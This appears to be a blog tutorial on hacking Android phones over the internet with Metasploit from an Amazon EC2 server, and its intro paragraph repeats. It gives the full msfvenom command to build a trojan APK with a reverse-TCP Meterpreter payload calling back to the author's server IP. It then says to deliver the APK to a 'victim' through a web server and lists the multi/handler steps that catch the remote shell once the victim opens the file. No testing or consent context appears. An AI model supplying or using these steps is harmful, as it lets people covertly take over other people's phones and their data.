[No Portforwarding] How to hack Android Mobile Using Metsploit ( Over WAN using VPS)
Hello people,
If you are facing problem in Port Forwarding, No-Ip hosting..etc then you are at right place...
because in this technique we will use our VPS [how to create VPS see my tutorial here]
In this tutorial we will hack android mobile over WAN using our VPS(Virtual Private Server).
Lets Begin:
Hello people,
If you are facing problem in Port Forwarding, No-Ip hosting..etc then you are at right place...
because in this technique we will use our VPS [how to create VPS see my tutorial here]
In this tutorial we will hack android mobile over WAN using our VPS(Virtual Private Server).
Lets Begin:
- First of All you need to see this 3 Tutorials On :
- how to create AWS amazon account. [click here]
- how to create EC2 (VPS) on ammazon. [click here]
- how to install metasploit on EC@ (VPS). [click here]
- now connect to your EC2(VPS) usig puTTY.exe
- type this command in terminal to create payload
- msfvenom -p android/meterpreter/reverse_tcp LHOST=54.71.89.249 R > hack.apk
- Here lhost will be your EC2 (VPS) public IP address (in my case it is 54.71.89.249)(see image)
- by this command you will create apk named "hack.apk".
- Now you have to transfer this apk to your victim BY coping it on to your apache2 server folder.
- or you may use other Offline Linux system to create your payload ..and then send that apk ...
- To start metasploit type in "msfconsole".
- then type " use exploit/multi/handler"
- then type " set payload android/meterpreter/reverse_tcp "
- then type" set LHOST 54.71.89.249" it may be diffrent in your case (see image)
- then type "set ReverseListenerBindAddress 172.31.6.246" now this is your local address provided to your EC2 (VPS) (see image)
- and last just type " exploit " .
- when ever your victim open your apk he will be hacked.....
Comments
Post a Comment